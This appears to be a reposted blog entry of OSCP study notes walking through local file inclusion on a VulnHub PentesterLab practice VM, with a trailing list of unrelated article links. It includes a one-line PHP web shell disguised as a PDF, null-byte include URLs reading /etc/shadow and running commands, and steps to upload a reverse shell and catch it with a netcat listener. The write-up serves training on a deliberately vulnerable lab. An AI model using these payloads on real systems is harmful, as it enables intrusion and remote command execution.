将相本无种,男儿当自强。这篇文章主要讲述OSCP Learning Notes - WebApp Exploitation相关的知识,希望能为你提供帮助。
Local File Inclusion[LFI]
Target
Pentester Lab: Download from the following website:
https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/
文章图片
1. Use netdiscover to find the IP of the target server. The IP address of the target server is 10.0.0.22.
netdiscover
文章图片
文章图片
2. Click different buttons of the website, and watch the change of the URL. page= XXXX
【OSCP Learning Notes - WebApp Exploitation】
文章图片
文章图片
3. Scan the target website using the tool nikto.
nikto -h 10.0.0.22
文章图片
4.Change the URL to "http://10.0.0.22/index.php?page=../../etc/shadow%00", and press enter. We can find the following warning message.
文章图片
5. Return to the submit page. Find that we can upload pdf files to the website.
文章图片
6. Make a shell.pdf file and save it.
%PDF-1.4< ?php system($_GET["cmd"]); ?>
7. Upload the shell.pdf to target website.
文章图片
8.Change the URL to the following type with shell commands.
http://10.0.0.22/index.php?page=uploads/shell.pdf%00& cmd=whoami
文章图片
http://10.0.0.22/index.php?page=uploads/shell.pdf%00& cmd=pwd
文章图片
9 Down load a web-shells from the following website.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
文章图片
10.Modify the web-shell file. ①Add the PDF tag. ②Change the ip and port.
文章图片
文章图片
11.Copy the php shell file as shell2.pdf. And upload this file to the website.
cp php-reverse-shell.php shell2.pdf
文章图片
12. Listening the port 4444 on Linux
nv -nvlp 4444
文章图片
13.Browse the following URL through Firefox.
http://10.0.0.22/index.php?page=uploads/shell2.pdf%00
文章图片
14. Then we can use the shell command we like on the terminal.
文章图片
推荐阅读
- 开发环境配置-存储库Web库App爬取相关库
- 使用Appium操作YY语音例子
- Polymerjs安装详细步骤
- Polymerjs iron表单iron-form
- Polymerjs iron-dropdown元素
- Polymerjs iron元素
- Polymerjs iron-collapse元素
- Polymerjs iron-ajax元素
- Polymerjs iron-a11y-keys元素